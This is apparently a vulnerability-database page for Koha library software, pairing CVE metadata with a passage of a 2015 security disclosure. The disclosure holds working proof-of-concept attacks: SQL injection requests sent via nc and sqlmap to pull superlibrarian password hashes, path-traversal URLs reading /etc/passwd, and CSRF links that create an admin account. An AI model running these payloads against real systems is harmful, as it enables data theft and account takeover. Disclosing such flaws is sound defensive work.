==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002

====================================================================

You will notice different output in every second request, demonstrating the evaluation of the payload.

##################################################################################################

PoC End

##################################################################################################

================================= 3. Path Traversal (CVE-2015-4633) =================================

Vulnerability

The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal.

References

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408

##################################################################################################

PoC:

##################################################################################################

The following input is used to print out /etc/passwd:

/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

##################################################################################################

PoC End

##################################################################################################

================================= 4. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks.

The attack can be performed by:

through a compromised user account.

References

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

##################################################################################################

PoC / Attack Scenario:

##################################################################################################

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

--> http:///cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens

--> http:///cgi-bin/koha/virtualshelves/shelves.pl

the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:

Create new user:

--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibririan permission:

--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log as superlibrarian.

Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists.

##################################################################################################

PoC / Attack Scenario End

##################################################################################################

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0024",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "library software community koha",
        "scope": null,
        "trust": 3.0,
        "vendor": "koha",
        "version": null
      },
      {
        "model": "library software community",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "koha",
        "version": "*"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 1.0,
        "vendor": "koha",
        "version": "*"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.16.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.18.8"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.20.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.16"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.16.12"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.18.0"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.20.1"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.20.x"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.16.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.16.12"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.14.16"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.14.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.20.1"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.18.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.18.08"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.05"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.06"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.03"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.04"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.01"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.02"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.20"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18.7"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16.11"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.20.1"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18.8"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16.12"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:koha:koha",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Raschin Ghanad-Tavakoli",
    "sources": [
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2015-4631",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 6.8,
            "id": "CVE-2015-4631",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "LOW",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2015-05198",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05201",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05199",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05200",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2015-05197",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.2,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "72631f14-1e6e-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.9 [IVD]"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.3,
            "id": "CVE-2015-4631",
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.8,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2015-4631",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2015-4631",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05198",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05201",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05199",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05200",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05197",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201512-696",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "72631f14-1e6e-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl. Koha Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. Multiple directory-traversal vulnerabilities\n3. Multiple HTML Injection vulnerabilities\n4. Multiple cross-site scripting vulnerabilities\n5. Multiple cross site request forgery vulnerabilities\nAn attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. ===============================================================================================\nSBA Research Vulnerability Disclosure\u00a0\n===============================================================================================\n\ntitle: \t\t\t        Koha Unauthenticated SQL injection\nproduct: \t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Koha ILS\naffected version:\t3.20.x \u003c= 3.20.1, 3.18.x \u003c= 3.18.8, 3.16.x \u003c= 3.16.12\nfixed version:\t\t3.20.1, 3.17.8, 3.16.12\nCVE numbers:\tCVE-2015-4633, CVE-2015-4632, CVE-2015-4631\nimpact:\t\t\tcritical\nwebsite:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://www.koha-community.org/\n\nfound by:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Raschin Tavakoli / SBA Research Combinatorial Security Testing Group\ncontact:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0cst@sba-research.org\n\n\nReferences:\t\thttp://koha-community.org/security-release-koha-3-20-1/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-18-8/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-16-12/\n\n\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u200bhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\n\n===============================================================================================\n\n=========================\n1. Mutiple SQL Injections\n=========================\n\n+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) \u00a0 +\n+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n\nVulnerability:\n--------------\nThe url parameter \u0027number\u0027 in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n1. Inspect Koha database schema\n\n\u00a0 \u00a0Have a look at how to query the database for superlibrarian users:\n\u00a0 \u00a0http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians\n\n\u00a0 \u00a0So basically we we need to execute some SQL statement like this:\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\n2. Query the database with sqlmap\n\n\u00a0 \u00a0So let\u0027s fire up sqlmap with the --sql-shell parameter and input the query:\n\n\u00a0 \u00a0root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0_\n\u00a0 \u00a0 ___ ___| |_____ ___ ___ \u00a0{1.0-dev-nongit-20150513}\n\u00a0 \u00a0|_ -| . | | \u00a0 \u00a0 | .\u0027| . |\n\u00a0 \u00a0|___|_ \u00a0|_|_|_|_|__,| \u00a0_|\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0|_| \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |_| \u00a0 http://sqlmap.org\n\n\n\u00a0 \u00a0[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0027s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n\u00a0 \u00a0[*] starting at 09:20:07\n\n\n\u00a0 \u00a0[09:20:07] [INFO] testing connection to the target URL\n\u00a0 \u00a0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n\u00a0 \u00a0---\n\u00a0 \u00a0Parameter: number (GET)\n\u00a0 \u00a0 \u00a0 \u00a0Type: AND/OR time-based blind\n\u00a0 \u00a0 \u00a0 \u00a0Title: MySQL \u003e= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)\n\u00a0 \u00a0 \u00a0 \u00a0Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)\n\u00a0 \u00a0---\n\u00a0 \u00a0[09:20:09] [INFO] testing MySQL\n\u00a0 \u00a0[09:20:09] [INFO] confirming MySQL\n\u00a0 \u00a0[09:20:09] [INFO] the back-end DBMS is MySQL\n\u00a0 \u00a0web server operating system: Linux Debian\n\u00a0 \u00a0web application technology: Apache 2.4.10\n\u00a0 \u00a0back-end DBMS: MySQL \u003e= 5.0.0\n\u00a0 \u00a0[09:20:09] [INFO] calling MySQL shell. To quit type \u0027x\u0027 or \u0027q\u0027 and press ENTER\n\n\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\u00a0 \u00a0[09:20:25] [INFO] fetching SQL SELECT statement query output: \u0027select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1\u0027\n\u00a0 \u00a0[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind\n\u00a0 \u00a0[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\n\u00a0 